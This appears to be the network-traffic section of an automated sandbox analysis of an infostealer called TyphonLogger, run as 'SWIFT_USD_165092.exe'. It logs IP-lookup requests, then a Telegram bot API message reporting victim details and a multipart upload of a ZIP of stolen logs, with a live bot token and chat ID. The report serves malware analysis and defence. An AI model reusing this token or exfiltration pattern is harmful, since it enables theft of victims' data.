                                                                                      Vary: Origin
                                                                                      Data Raw: 38 34 2e 31 37 2e 35 32 2e 34 35
                                                                                      Data Ascii: 84.17.52.45


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      7192.168.2.549724173.231.16.7680C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      May 22, 2023 19:50:38.269848108 CEST957OUTGET / HTTP/1.1
                                                                                      Host: api.ipify.org
                                                                                      Connection: Keep-Alive
                                                                                      May 22, 2023 19:50:38.420283079 CEST957INHTTP/1.1 200 OK
                                                                                      Content-Length: 11
                                                                                      Content-Type: text/plain
                                                                                      Date: Mon, 22 May 2023 17:50:38 GMT
                                                                                      Vary: Origin
                                                                                      Data Raw: 38 34 2e 31 37 2e 35 32 2e 34 35
                                                                                      Data Ascii: 84.17.52.45
                                                                                      May 22, 2023 19:50:46.786431074 CEST963OUTGET / HTTP/1.1
                                                                                      Host: api.ipify.org
                                                                                      May 22, 2023 19:50:46.941960096 CEST964INHTTP/1.1 200 OK
                                                                                      Content-Length: 11
                                                                                      Content-Type: text/plain
                                                                                      Date: Mon, 22 May 2023 17:50:46 GMT
                                                                                      Vary: Origin
                                                                                      Data Raw: 38 34 2e 31 37 2e 35 32 2e 34 35
                                                                                      Data Ascii: 84.17.52.45
                                                                                      May 22, 2023 19:51:33.346762896 CEST967OUTGET / HTTP/1.1
                                                                                      Host: api.ipify.org
                                                                                      May 22, 2023 19:51:34.213435888 CEST967INHTTP/1.1 200 OK
                                                                                      Content-Length: 11
                                                                                      Content-Type: text/plain
                                                                                      Date: Mon, 22 May 2023 17:51:33 GMT
                                                                                      Vary: Origin
                                                                                      May 22, 2023 19:51:34.362384081 CEST967INData Raw: 38 34 2e 31 37 2e 35 32 2e 34 35
                                                                                      Data Ascii: 84.17.52.45


                                                                                      HTTPS Proxied Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.549716172.67.69.226443C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-05-22 17:49:53 UTC0OUTGET /84.17.52.45/json HTTP/1.1
                                                                                      User-Agent: ipapi.co /#c-sharp-v1.03
                                                                                      Host: ipapi.co
                                                                                      Connection: Keep-Alive
                                                                                      2023-05-22 17:49:54 UTC0INHTTP/1.1 200 OK
                                                                                      Date: Mon, 22 May 2023 17:49:54 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 751
                                                                                      Connection: close
                                                                                      Allow: GET, OPTIONS, POST, HEAD, OPTIONS
                                                                                      X-Frame-Options: DENY
                                                                                      Vary: Host, Origin
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Referrer-Policy: same-origin
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ubt7o2vXNqcTJdj%2F8pZ3aXV%2FvoKJT%2BWFkcDZm%2Bgb0Yx1EyKgHKgL6lMJAFKe%2BG4KYaS2i0fGhg%2B1YjFk8YqN5kMRrjVwrok%2FqJg1KWOq6CBaLfvBWigVP%2B%2Bx"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 7cb6e5fc6f351bdb-FRA
                                                                                      2023-05-22 17:49:54 UTC0INData Raw: 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 34 2e 31 37 2e 35 32 2e 34 35 22 2c 0a 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 34 2e 31 37 2e 35 32 2e 30 2f 32 33 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 5a 75 72 69 63 68 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 5a 75 72 69 63 68 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 20 22 5a 48 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 43 48 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 20 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 43 48 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 5f 69 73
                                                                                      Data Ascii: { "ip": "84.17.52.45", "network": "84.17.52.0/23", "version": "IPv4", "city": "Zurich", "region": "Zurich", "region_code": "ZH", "country": "CH", "country_name": "Switzerland", "country_code": "CH", "country_code_is
                                                                                      2023-05-22 17:49:54 UTC1INData Raw: 33 2c 0a 20 20 20 20 22 61 73 6e 22 3a 20 22 41 53 32 31 32 32 33 38 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 0a 7d
                                                                                      Data Ascii: 3, "asn": "AS212238", "org": "Datacamp Limited"}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      1192.168.2.549718149.154.167.220443C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-05-22 17:50:27 UTC1OUTGET /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171&text=New%20TyphonLogger%20log!%0A---------------------%0AUsername:%20user%0AMachine%20name:%20128757%0AHWID:%201B269386E0%0AIP%20address:%2084.17.52.45%0A---------------------%0ABuild%20Tag:%20%0A---------------------%0AYour%20logs%20are%20in%20the%20ZIP%20file%20being%20uploaded.%0AThank%20you%20for%20using%20TyphonLogger!%0Ahttps://t.me/typhon_shop HTTP/1.1
                                                                                      Host: api.telegram.org
                                                                                      Connection: Keep-Alive
                                                                                      2023-05-22 17:50:27 UTC1INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 22 May 2023 17:50:27 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 651
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2023-05-22 17:50:27 UTC2INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 37 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 38 36 39 31 32 37 30 34 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 4d 74 72 61 64 65 20 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 6d 74 72 61 64 65 64 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 38 39 30 30 32 31 37 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 4d 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 54 72 61 64 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 6d 74 72 61 64 65 5f 30 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 38 34 37 37 37 38 32 37 2c 22 74
                                                                                      Data Ascii: {"ok":true,"result":{"message_id":722,"from":{"id":5869127049,"is_bot":true,"first_name":"MMtrade Bot","username":"mmtraded_bot"},"chat":{"id":1689002171,"first_name":"MM","last_name":"Trade","username":"mmtrade_001","type":"private"},"date":1684777827,"t


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      2192.168.2.549719149.154.167.220443C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-05-22 17:50:27 UTC3OUTPOST /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendDocument?chat_id=1689002171 HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary="0c552aff-97a1-416c-92c5-e86524fa2be5"
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 778795
                                                                                      Expect: 100-continue
                                                                                      2023-05-22 17:50:27 UTC3INHTTP/1.1 100 Continue
                                                                                      2023-05-22 17:50:27 UTC3OUTData Raw: 2d 2d 30 63 35 35 32 61 66 66 2d 39 37 61 31 2d 34 31 36 63 2d 39 32 63 35 2d 65 38 36 35 32 34 66 61 32 62 65 35 0d 0a
                                                                                      Data Ascii: --0c552aff-97a1-416c-92c5-e86524fa2be5
                                                                                      2023-05-22 17:50:27 UTC3OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 5b 32 32 2e 30 35 2e 30 32 30 32 33 20 32 30 2e 34 38 2e 31 34 5d 3d 61 6c 66 6f 6e 73 40 31 32 38 37 35 37 5f 31 42 32 36 39 33 38 36 45 30 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 54 65 6d 70 25 35 43 25 35 42 32 32 2e 30 35 2e 30 32 30 32 33 25 32 30 32 30 2e 34 38 2e 31 34 25 35 44 25 33 44 61 6c 66 6f 6e 73 25 34 30 31 32 38
                                                                                      Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\Temp\[22.05.02023 20.48.14]=user@128757_1B269386E0.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5C%5B22.05.02023%2020.48.14%5D%3Duser%40128
                                                                                      2023-05-22 17:50:27 UTC3OUTData Raw: 50 4b 03 04 14 00 00 00 08 00 39 9e b6 56 81 78 95 16 3c 00 00 00 4d 00 00 00 17 00 24 00 32 32 2d 30 35 2d 32 30 32 33 20 32 32 2d 34 37 2d 34 34 2e 74 78 74 0a 00 20 00 00 00 00 00 01 00 18 00 67 6d 5d 3e 21 8d d9 01 67 6d 5d 3e 21 8d d9 01 67 6d 5d 3e 21 8d d9 01 53 56 56 56 48 ad 28 c8 c9 2f 4a 2d 52 50 06 72 34 8c 8c 74 0d 4c 75 8d 0c 8c 8c 15 0c 2d ad 4c cd ac 8c 2d 35 b9 b8 b8 40 72 c9 c5 45 c5 c5 18 aa 8c 0c ac 4c cc ac 4c 4c 34 b9 00 50 4b 03 04 14 00 00 00 00 00 49 9e b6 56 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 24 00 42 75 69 6c 64 54 61 67 2e 74 78 74 0a 00 20 00 00 00 00 00 01 00 18 00 8b 17 a4 4f 21 8d d9 01 8b 17 a4 4f 21 8d d9 01 8b 17 a4 4f 21 8d d9 01 50 4b 03 04 14 00 00 00 00 00 48 9e b6 56 00 00 00 00 00 00 00 00 00 00 00 00 16 00
                                                                                      Data Ascii: PK9Vx<M$22-05-2023 22-47-44.txt gm]>!gm]>!gm]>!SVVVH(/J-RPr4tLu-L-5@rELLL4PKIV$BuildTag.txt O!O!O!PKHV
                                                                                      2023-05-22 17:50:27 UTC19OUTData Raw: 99 46 ee 89 8b a0 46 47 21 24 a3 72 df 7e df 76 9e 3a 8e b8 dd ad 74 f1 82 93 f2 6b 6e c3 59 c3 3d 79 2e e1 e0 ee 77 77 76 ca b6 fb bc 5b 6a ee c6 ff b8 75 9a b2 7e c9 71 4f 65 35 d2 b5 73 97 89 f2 22 32 59 46 97 61 bd f4 c6 e6 c7 45 b3 ba 64 ca da 91 b0 49 d9 a1 d5 ea 69 61 7c e1 1b 3e d3 1b 36 e0 b8 27 83 94 1b 8e 84 82 ef 00 22 24 a9 7f db 73 62 bf 7c d2 dd 27 bd 5d 59 17 c8 a0 0b e1 32 89 d7 9d a5 bc 29 b2 86 7c 99 e9 58 d9 c6 55 87 7d 51 ab 2c 5d 3a f6 ce f6 b5 96 8a 91 3b 25 78 02 b9 9d bd ef 47 05 a6 7a 82 57 6f 07 7f 4c 5a fd 9b d2 c8 a5 02 93 8b 3a a5 e8 f5 df d9 3b a2 3a 83 7e d1 e0 ce 86 09 2a d0 26 e6 81 b8 63 2f bd c2 f9 66 22 f5 61 4a ac 31 e9 97 b6 81 0e fd 21 96 f5 52 cb 7e d2 c2 c7 dc 3a a1 8e 27 8d 56 8d 6d 06 b9 e3 1e 58 f3 9e e2 02 30
                                                                                      Data Ascii: FFG!$r~v:tknY=y.wwv[ju~qOe5s"2YFaEdIia|>6'"$sb|']Y2)|XU}Q,]:;%xGzWoLZ:;:~*&c/f"aJ1!R~:'VmX0
                                                                                      2023-05-22 17:50:27 UTC35OUTData Raw: 17 2c 05 c2 8f 95 27 93 ed 64 2f 01 e4 8f fa dc 26 b5 f0 85 19 d9 e8 55 2a 9b fa 32 53 c5 f0 14 44 d3 5d 39 f5 3b 14 e0 f0 87 a8 b1 6f b4 28 7d 1e 16 13 75 fe 2e 9b b8 ac 6a c2 e0 47 91 ef a7 70 21 63 0d ef 31 39 b8 ed 7b c9 d6 5a b5 91 c4 99 9c 68 84 6e 30 91 ce 7f 17 d5 61 8c a6 cd b0 07 75 42 6a d0 8f 1b f2 4d 98 b5 d1 7e e6 8f 41 24 19 b2 2d 18 49 06 18 3e 86 26 5b ba 02 25 43 9b 3f 0b 27 e9 60 7c d7 5e c3 87 58 2a 83 db 10 6f 85 83 de 4e bc 99 3b 6f 95 15 56 4d 62 fe c0 de 36 fa f3 dd 05 4b b6 72 c0 07 e0 2e 3d 4d 25 d2 83 cb af 2f 7c ee 75 4a 60 de 08 fa 53 d9 75 f9 32 96 4c 9e 28 fd 7e 97 bc 58 d5 ac b5 b0 6d f9 81 4e 22 89 f4 d8 2f 83 21 7d c4 3e dc 6e db 0a 9a ab b8 f6 c9 f3 34 12 ad 98 5a 51 34 6f 29 1f bd 67 f7 8d ea 57 99 75 a1 d1 d8 23 ec 3b
                                                                                      Data Ascii: ,'d/&U*2SD]9;o(}u.jGp!c19{Zhn0auBjM~A$-I>&[%C?'`|^X*oN;oVMb6Kr.=M%/|uJ`Su2L(~XmN"/!}>n4ZQ4o)gWu#;
                                                                                      2023-05-22 17:50:27 UTC51OUTData Raw: aa 62 2a 5a 19 8b 8a 03 8d 69 65 d9 62 48 23 d8 c0 09 25 5d b5 92 34 4b e6 53 d4 2e ac 89 cf a2 ae 2c 63 83 cd 65 04 3c a0 88 82 61 f1 6b ef 12 a8 d7 de ec ae 4c 6b 5b 9c d6 5e 16 68 9e 68 88 37 66 9c e6 33 ee b9 85 af a8 75 af fb 63 bc 27 be a0 fd 5b 14 02 36 41 51 5e 73 a2 da 09 ba 48 b4 11 23 96 77 04 3b d2 18 69 94 54 42 80 81 d0 14 94 0e 63 f9 90 09 69 4c 70 40 df 60 26 c6 dd 1e 08 ce 71 af 3a e7 bb da a2 bb 8a 42 8d ca 56 7a 6c 18 f5 ed c6 64 51 1a 93 e7 d2 67 b7 f5 69 52 e7 e8 a0 ad 7e 7c 7e b0 ed c7 c7 9f 72 cb 0e 14 76 6d f3 ae 73 ed 66 fd a4 83 86 ad 69 fe 9d 8f 87 39 f0 98 b9 45 9c d3 d8 93 ba c0 3a 6d f7 46 16 5a 90 ed d5 04 cf d2 35 8b c3 50 7b ae fd 5b 32 05 37 ed 6e fc 59 49 4e b8 d1 86 17 2b c9 6c 15 85 bc 52 1e f0 15 33 f4 38 09 07 4b 9b
                                                                                      Data Ascii: b*ZiebH#%]4KS.,ce<akLk[^hh7f3uc'[6AQ^sH#w;iTBciLp@`&q:BVzldQgiR~|~rvmsfi9E:mFZ5P{[27nYIN+lR38K
                                                                                      2023-05-22 17:50:27 UTC67OUTData Raw: a2 d6 45 4a 1d 39 96 9c 99 d3 a4 84 b4 08 12 e8 7f 95 26 e9 9b bd 24 30 9f 58 59 72 c7 f6 db 85 fd b7 17 ab ff 2e 42 3f 6d 91 fe e6 bc b7 21 1c 35 1e 83 44 8a 7f d7 1f b8 1e 83 f4 d9 d7 0e 37 b5 bb f3 a4 7a 22 78 cd 2e 19 49 be 09 fe 39 53 25 73 55 38 9a 76 16 7b 4b 01 3e 7c a0 af 58 80 c3 60 ec 9f 47 a0 27 be dc 82 fb a9 99 1e 39 0e ea f5 27 8b 59 73 0e e8 9e 10 2c 99 ff 03 39 ff b6 2d b0 2d 11 c6 10 e4 e5 c7 41 e0 4e 1c 9e b6 4c af 38 c7 73 5a 38 c0 a0 8f 35 d5 01 bd 74 4a b3 62 83 3a 3e 3d 56 bc 10 9d 4d 3f 5f 5e 13 d1 bf a0 3c b2 e0 d2 56 e5 75 49 af a3 68 50 df b5 ae 97 f4 e1 51 f6 3d fb ac 9c 95 3f f7 2e 1b 1f 4e 89 a9 37 15 be 2a 4e 4c dc a9 be 49 86 3e 38 e4 b9 f8 ab bd f7 35 ee cf 75 7b d9 a4 67 a2 9d ee 1a f7 24 3e 9e d4 ee 1c 35 6d 70 da 3a 0c
                                                                                      Data Ascii: EJ9&$0XYr.B?m!5D7z"x.I9S%sU8v{K>|X`G'9'Ys,9--ANL8sZ85tJb:>=VM?_^<VuIhPQ=?.N7*NLI>85u{g$>5mp:
                                                                                      2023-05-22 17:50:27 UTC83OUTData Raw: 31 97 7d e3 0f e2 ec 03 61 c5 72 97 43 7b d3 5a ce d3 95 3d 52 c2 29 e7 76 43 97 c6 ed 13 fc ca df 3d a2 12 0f 8a 84 50 04 52 1f 43 b2 2a 80 a5 9b c5 1f ab e4 e0 a0 c2 63 58 79 8e f5 5e 62 33 a5 6b 39 6a 81 5a 61 55 c7 04 17 28 f3 47 81 c6 76 73 f9 51 ba a9 ed ca d6 cd 65 ee 57 31 af e3 86 b3 ca 21 d1 b2 98 a0 56 ce 2b 0e 5c f5 86 ec c8 e1 6f f9 e2 5f 42 19 60 8c f2 91 6f a6 e9 c6 4d f2 eb c8 d5 57 83 4c ef ea 11 47 f6 f3 d8 3c aa 38 7b 9e 3a 36 b4 13 91 8d b5 89 fd e2 2e 82 b1 d9 43 2d c6 3b 4f 91 cf 7c e8 e7 fa 3f b7 d8 9c 2a 89 36 af f0 4e a6 7c 12 51 f0 5c 6f b0 83 43 8e 26 19 0d f9 96 50 8f bd 9b c7 27 30 d6 c9 d7 21 2b 6f 20 ab 11 39 1d 7f 65 a1 36 f4 d9 33 b2 a6 1b 99 3f bb af e6 60 87 d2 5e ef 8c 50 9f 97 fb f6 bb de bb d5 2a 46 fb 82 ba 01 c6 e8
                                                                                      Data Ascii: 1}arC{Z=R)vC=PRC*cXy^b3k9jZaU(GvsQeW1!V+\o_B`oMWLG<8{:6.C-;O|?*6N|Q\oC&P'0!+o 9e63?`^P*F
                                                                                      2023-05-22 17:50:27 UTC99OUTData Raw: 78 80 6f 8f ec d0 3f 10 16 3c 2d 73 fc 8f 97 ce 67 eb ea cb 53 e7 3f 1d d9 13 12 bd e4 b9 ed fd 51 38 3b dc 69 f4 fa 03 6d 67 cd c0 f0 b3 73 67 43 fb fa ed d3 1c 76 b3 8a 3c 9c 1e c2 d2 75 9f c6 20 44 bb be 69 95 d9 bd 19 c0 dd 0e 3a d1 c8 43 66 7e 7a 55 4c b6 cf d9 ee 45 88 b2 4f d9 aa d8 ce d9 5f f3 53 5e 7c c4 a3 d8 f1 da c1 e0 4b 5c c7 99 1e 3f b2 09 78 ea 63 5b bf 58 94 5c cf 2a 35 b8 be c8 55 3f 44 17 33 6b d7 f5 64 5f 7c 21 80 51 f1 76 64 95 0f 41 99 62 70 12 bb f0 3e 6b f2 d9 d9 33 ab bc f6 aa e5 6e f1 af 99 db 5f 12 aa a5 47 1c f9 7f 0c 89 e5 bf 9d b9 ef 7e b7 e7 fe e6 93 b5 f9 3e 97 67 e2 26 a1 f6 41 6e db 23 32 85 18 a4 31 15 b8 14 73 2e ea b0 80 d2 4a 41 06 6e bf 36 5b cb 5a 23 3c 78 fa a8 f8 1f 1f f1 d6 01 cf 29 45 a1 db 3a 7c a3 b8 f3 70 06
                                                                                      Data Ascii: xo?<-sgS?Q8;imgsgCv<u Di:Cf~zULEO_S^|K\?xc[X\*5U?D3kd_|!QvdAbp>k3n_G~>g&An#21s.JAn6[Z#<x)E:|p
                                                                                      2023-05-22 17:50:27 UTC115OUTData Raw: e2 5a 63 6d f9 21 e2 bd 87 73 8a 66 42 f6 e3 9c e3 f8 70 81 9c 38 35 15 a9 a6 4f 63 c0 55 11 57 c3 18 7a 85 8d 7d 44 f8 24 b6 d5 19 54 d1 22 6a d1 2e 38 f0 bd be 50 a7 f4 8a ed c7 c3 23 8a 26 ee c8 ae 21 ec 6a 6c 5a f3 ab 4b c0 02 93 3e 75 48 18 5f af 40 bf de c5 93 3f 10 1f 96 d8 b7 8c ad 33 0f a9 37 66 2a 12 1a 03 54 f9 8f a7 91 31 0e 57 b7 ba ae 93 ef d5 e4 1f 51 64 f9 04 3c 47 49 d6 8a cf ca d7 89 f0 0e 70 f7 1b 54 b0 12 54 20 f7 92 9b e9 89 ec 55 3c 77 52 c3 ee 5a 92 55 33 f2 24 7b 3d 90 0e d2 aa 78 6e 6e cf ff 39 35 b5 43 f9 96 dd bd 32 57 ad a5 b2 1f bc 73 3b 87 e5 f1 28 86 5a 10 e3 0f db 47 74 fc 2d 4e 0d 43 1e 21 4c 4f ba 25 87 70 f1 53 5f 2f 72 bb 35 85 ad bc 02 5e be df b8 04 54 16 a9 7a c7 22 ed 6e 85 cf 1b 7b c7 31 3f cf 74 b1 15 e0 c8 68 4e
                                                                                      Data Ascii: Zcm!sfBp85OcUWz}D$T"j.8P#&!jlZK>uH_@?37f*T1WQd<GIpTT U<wRZU3${=xnn95C2Ws;(ZGt-NC!LO%pS_/r5^Tz"n{1?thN
                                                                                      2023-05-22 17:50:27 UTC131OUTData Raw: 2f 37 f2 6e 67 a6 36 78 34 6b 19 37 b7 d8 45 aa a4 72 c9 9e f2 7e f5 60 dc 75 d1 b0 39 e0 b5 e3 d9 83 df b1 db d2 db 61 f8 48 68 22 c7 e2 27 8a 4c 7d f1 82 db a8 a5 80 da bb 2f 52 5d c7 6e 71 fb 46 25 77 eb de 24 2e 60 2b 24 cc a9 75 0a 27 54 b5 dd 22 88 1f 3e f9 ae 47 8d 08 fc 59 53 3e 6a 8a 5f 79 e6 87 63 5d c2 76 be cb 25 7f cd 74 c6 39 43 5d 20 12 3b 61 4e 7e d4 5d 80 cc d5 4d 05 79 51 26 3f 75 59 84 ff fc d1 c8 5e 9e b6 95 32 7e 92 6b bc aa 89 ed c5 c1 10 a1 f4 de d0 ef 91 c4 5b 6f 36 2d f6 0f fa 93 cb 71 02 05 c9 e2 52 64 b2 d3 75 78 78 9a 7d 96 80 f8 7b 7f 09 1f fe ca a0 ce 7b bb 23 f8 4e 7c 5d e1 7e 68 ea de d0 59 ae b4 23 e9 79 b3 1e b0 45 c5 59 42 5c f5 33 bd f6 cd 06 e8 8b 16 d9 a4 d0 e2 f0 e8 17 e2 ef b5 6e 4e ad 8c 47 bd 21 c3 e3 71 01 cd f7
                                                                                      Data Ascii: /7ng6x4k7Er~`u9aHh"'L}/R]nqF%w$.`+$u'T">GYS>j_yc]v%t9C] ;aN~]MyQ&?uY^2~k[o6-qRduxx}{{#N|]~hY#yEYB\3nNG!q
                                                                                      2023-05-22 17:50:27 UTC147OUTData Raw: 6f ec 5e f9 04 e5 6a 66 74 75 54 f4 4b 11 01 bd 44 b0 b0 6e d8 92 43 f3 f5 c5 7b fd d8 29 17 8c 08 2d df e0 8b 5a a8 be 6b fb 33 f6 1c 75 68 cd ee 36 26 8a 58 8e 32 fd 51 68 53 06 ae 36 fd e3 46 33 ff 5b 9e 40 0d b2 e7 08 52 03 cb 6a 8e e3 a1 fa 8a 46 b8 01 24 2c 11 4e 96 44 2b 98 e0 1e af d8 8c 28 06 8e 04 d8 bd be 6e de eb 8c 13 7e b6 7d 0c aa 8e cf 50 ed 5a 7c a5 1d eb a9 3f b7 7c c3 ad 35 df 86 e2 de d2 fa fa 85 52 10 f5 e6 d7 a7 28 ff 8e 8b 77 17 94 18 8e cc e5 7f 04 fa 77 7d 0c 89 82 87 20 1f 67 bc da 3c 7a bd 31 96 38 19 a8 76 4b a6 57 2d 30 c7 df 35 89 67 c1 d3 f3 52 c5 af 9a 91 35 87 e0 90 73 8a c8 9b 03 5d d2 ae 93 5a b7 4d f8 fd 06 ad 3d c7 ed 0a b7 7a 52 d1 a8 c4 ec 4f 63 7f 74 c3 04 c6 f0 75 e2 cf 9e de 19 58 3e b7 7a 67 80 f3 72 e7 9e 83 36
                                                                                      Data Ascii: o^jftuTKDnC{)-Zk3uh6&X2QhS6F3[@RjF$,ND+(n~}PZ|?|5R(ww} g<z18vKW-05gR5s]ZM=zROctuX>zgr6
                                                                                      2023-05-22 17:50:27 UTC163OUTData Raw: f3 0c f2 51 87 81 4e 0e 9f ae 6e f8 0c 86 30 71 8f ee 5c 7f 52 58 ca 72 d8 90 44 d2 0f c3 c4 e8 ef 42 b3 fa 2c 43 9b ba 23 59 7d b0 ab bc cc 26 4c d6 3c 3c 7b b6 e2 51 15 fc 66 c3 fa ab ab 5c 4f 9a 7e a5 07 dd c9 68 69 1d ae 2c b4 c6 61 26 25 eb aa d5 51 5b c5 76 d4 c1 eb fb 27 d7 d4 63 ef b5 30 20 bf 8a 50 09 85 05 ae 46 0a 7f de 58 34 31 54 1b 89 52 4f d0 7c d7 7d ee 46 ce e7 cf 0b 6d 56 87 40 f0 f8 a3 4d cd 42 ff 3a c9 83 7b 6d 3c 6d bb 8a 4b 0d c2 95 f6 23 d5 2b 95 2b 4b fa 3b bf ea d5 6d 41 38 39 ea f9 a4 f3 56 fc a3 f6 e9 9f f7 c9 63 27 cf ad 02 2e 9d bd d5 5e c1 02 9a c5 11 fc af 08 f6 87 c0 35 2d 94 8d 9f 4e 59 13 1c a6 7d 4f 4b af fb 13 e3 8a 47 b0 83 ec f9 59 ac ef 27 ce 4e 01 ee 83 ef ea 6a f7 7e 4e 5d f1 1c 52 3e 53 94 a7 30 16 b4 51 10 33 0b
                                                                                      Data Ascii: QNn0q\RXrDB,C#Y}&L<<{Qf\O~hi,a&%Q[v'c0 PFX41TRO|}FmV@MB:{m<mK#++K;mA89Vc'.^5-NY}OKGY'Nj~N]R>S0Q3
                                                                                      2023-05-22 17:50:27 UTC179OUTData Raw: e0 11 50 79 5a 8f 84 ad ec 21 75 1f d1 1b 8b de b8 42 c1 d2 e1 55 10 90 10 bb 9e 74 24 94 ce 8b 56 cd ab 67 00 43 c8 c0 0f 21 34 d1 46 8e ae 07 95 10 1c 10 20 b1 3a a7 1b 46 5b d8 e5 c3 0d 4a 0a 3d 5d e6 bf 8b 08 89 10 56 24 0e 5a 40 87 a0 8f de 00 68 ab 9a fe 4a 78 26 45 19 45 38 68 13 fe ae 3e e4 84 58 40 41 26 a3 55 15 a3 8c 60 ae dc 24 da 22 ad 54 34 aa 03 d2 04 f1 25 1e 54 12 a1 75 43 40 7d 62 f1 08 54 d9 f7 40 a6 bd a3 ca 76 07 ad 00 ba 05 08 a9 47 aa 67 2c 9e 70 45 09 af 57 40 e9 4e 7d 1c 56 58 ec 6d 41 b8 f9 a2 46 91 cf 49 98 2d 14 cd 80 3c f4 a2 fa a5 e6 c7 82 54 8f 3f 72 ba 7d df fa 2e c2 ed 8d 5e 5e bd 6a 0a 35 74 ab fd 40 fc 5a 90 22 25 4e 0a 32 59 83 21 2e 9d 2c 2a 38 7a 63 32 e5 8d 73 e0 79 6b b2 a2 d1 15 a9 74 f4 63 37 bb 12 ae 34 5a c9 58
                                                                                      Data Ascii: PyZ!uBUt$VgC!4F :F[J=]V$Z@hJx&EE8h>X@A&U`$"T4%TuC@}bT@vGg,pEW@N}VXmAFI-<T?r}.^^j5t@Z"%N2Y!.,*8zc2syktc74ZX
